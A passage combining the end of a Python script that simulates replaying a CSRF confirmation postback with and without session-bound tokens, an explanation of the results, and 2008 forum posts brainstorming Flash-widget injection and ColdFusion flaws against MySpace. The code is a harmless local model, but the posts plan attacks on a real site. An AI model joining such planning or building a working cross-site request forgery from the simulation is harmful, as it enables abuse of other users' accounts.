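    """Server side. Returns 'posted' or 'redirect:front_page' (the symptom in the thread)."""
    f = {k: v[0] for k, v in parse_qs(encoded_fields, keep_blank_values=True).items()}
    if f.get("ctl00$cpMain$btnPostIt") != "Post It":
        return "redirect:front_page"
    expected = issue_token(cookie_session_id if bind_to_session else "",
                           f.get("ctl00$cpMain$ddlPostType", ""),
                           f.get("ctl00$cpMain$AboutMeEdit$hdnContent", ""))
    if not hmac.compare_digest(expected.encode(), f.get("hashChecker", "").encode()):
        return "redirect:front_page"
    return "posted"


def replay_from_other_account(bind_to_session):
    """digip captures his own confirmation postback, then someone else follows the link.

    Returns the outcome in digip's session and in the other account's session.
    """
    digip_sid, other_sid = "sid-digip", "sid-other-account"   # constructed cookie values
    captured = confirmation_postback(digip_sid if bind_to_session else "", NOOBLUBE_WIDGET)
    return {
        "same_session": handle_post_it(captured, digip_sid, bind_to_session),
        "other_session": handle_post_it(captured, other_sid, bind_to_session),
    }


if __name__ == "__main__":
    print("session-bound token:", replay_from_other_account(True))
    print("unbound token:      ", replay_from_other_account(False))
```

With `bind_to_session=True` the model reproduces the thread: the replay posts in digip's session and redirects the other account. With `bind_to_session=False` it posts in both, which is the one-link-fits-all CSRF digip was trying to build. The token alone does not stop the other thing he noticed, the server accepting the whole postback from a GET query string; that is a separate weakness, and the model parses both the same way on purpose.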
DingleBerries Posted October 17, 2008

This is my first time getting my hands dirty with Flash, and I must say I've googled most of the information. Really cool if anything comes from this.. if only I had a Facebook to play around with.
digip (Author) Posted October 17, 2008

One thing I know MySpace uses is ColdFusion modules. If anyone knows of any flaws in ColdFusion, we might be able to attach some sort of CFM page in there as well as the Flash widget. Not sure how that works, but just brainstorming at the moment.
DingleBerries Posted October 17, 2008

I can insert images and Flash, or images alone, now. JavaScript cannot be run outside the <object>, so no alerts. I'm still trying other things atm.